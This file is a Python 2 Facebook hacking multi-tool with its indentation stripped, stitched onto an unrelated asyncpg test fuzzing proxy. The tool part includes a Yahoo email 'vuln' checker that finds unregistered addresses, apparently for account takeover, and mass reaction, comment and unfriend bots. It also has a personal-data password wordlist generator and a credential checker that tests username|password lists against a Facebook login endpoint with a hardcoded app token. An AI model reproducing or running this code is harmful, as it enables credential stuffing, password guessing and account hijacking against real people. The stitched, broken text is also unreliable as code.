jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
|
fuzzer.py
|
# Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0
import asyncio
import socket
import threading
import typing
from asyncpg import cluster
class StopServer(Exception):
pass
class TCPFuzzingProxy:
def __init__(self, *, listening_addr: str='127.0.0.1',
listening_port: typing.Optional[int]=None,
backend_host: str, backend_port: int,
settings: typing.Optional[dict]=None) -> None:
self.listening_addr = listening_addr
self.listening_port = listening_port
self.backend_host = backend_host
self.backend_port = backend_port
self.settings = settings or {}
self.loop = None
self.connectivity = None
self.connectivity_loss = None
self.stop_event = None
self.connections = {}
self.sock = None
self.listen_task = None
async def _wait(self, work):
work_task = asyncio.ensure_future(work)
stop_event_task = asyncio.ensure_future(self.stop_event.wait())
try:
await asyncio.wait(
[work_task, stop_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.stop_event.is_set():
raise StopServer()
else:
return work_task.result()
finally:
if not work_task.done():
work_task.cancel()
if not stop_event_task.done():
stop_event_task.cancel()
def start(self):
started = threading.Event()
self.thread = threading.Thread(
target=self._start_thread, args=(started,))
self.thread.start()
if not started.wait(timeout=2):
raise RuntimeError('fuzzer proxy failed to start')
def stop(self):
self.loop.call_soon_threadsafe(self._stop)
self.thread.join()
def _stop(self):
self.stop_event.set()
def _start_thread(self, started_event):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.connectivity = asyncio.Event()
self.connectivity.set()
self.connectivity_loss = asyncio.Event()
self.stop_event = asyncio.Event()
if self.listening_port is None:
self.listening_port = cluster.find_available_port()
self.sock = socket.socket()
self.sock.bind((self.listening_addr, self.listening_port))
self.sock.listen(50)
self.sock.setblocking(False)
try:
self.loop.run_until_complete(self._main(started_event))
finally:
self.loop.close()
async def _main(self, started_event):
self.listen_task = asyncio.ensure_future(self.listen())
# Notify the main thread that we are ready to go.
started_event.set()
try:
await self.listen_task
finally:
for c in list(self.connections):
c.close()
await asyncio.sleep(0.01)
if hasattr(self.loop, 'remove_reader'):
self.loop.remove_reader(self.sock.fileno())
self.sock.close()
async def listen(self):
while True:
try:
client_sock, _ = await self._wait(
self.loop.sock_accept(self.sock))
backend_sock = socket.socket()
backend_sock.setblocking(False)
await self._wait(self.loop.sock_connect(
backend_sock, (self.backend_host, self.backend_port)))
except StopServer:
break
conn = Connection(client_sock, backend_sock, self)
conn_task = self.loop.create_task(conn.handle())
self.connections[conn] = conn_task
def trigger_connectivity_loss(self):
self.loop.call_soon_threadsafe(self._trigger_connectivity_loss)
def _trigger_connectivity_loss(self):
self.connectivity.clear()
self.connectivity_loss.set()
def restore_connectivity(self):
self.loop.call_soon_threadsafe(self._restore_connectivity)
def _restore_connectivity(self):
self.connectivity.set()
self.connectivity_loss.clear()
def reset(self):
self.restore_connectivity()
def _close_connection(self, connection):
conn_task = self.connections.pop(connection, None)
if conn_task is not None:
conn_task.cancel()
class Connection:
def __init__(self, client_sock, backend_sock, proxy):
self.client_sock = client_sock
self.backend_sock = backend_sock
self.proxy = proxy
self.loop = proxy.loop
self.connectivity = proxy.connectivity
self.connectivity_loss = proxy.connectivity_loss
self.proxy_to_backend_task = None
self.proxy_from_backend_task = None
self.is_closed = False
def close(self):
if self.is_closed:
return
self.is_closed = True
if self.proxy_to_backend_task is not None:
self.proxy_to_backend_task.cancel()
self.proxy_to_backend_task = None
if self.proxy_from_backend_task is not None:
self.proxy_from_backend_task.cancel()
self.proxy_from_backend_task = None
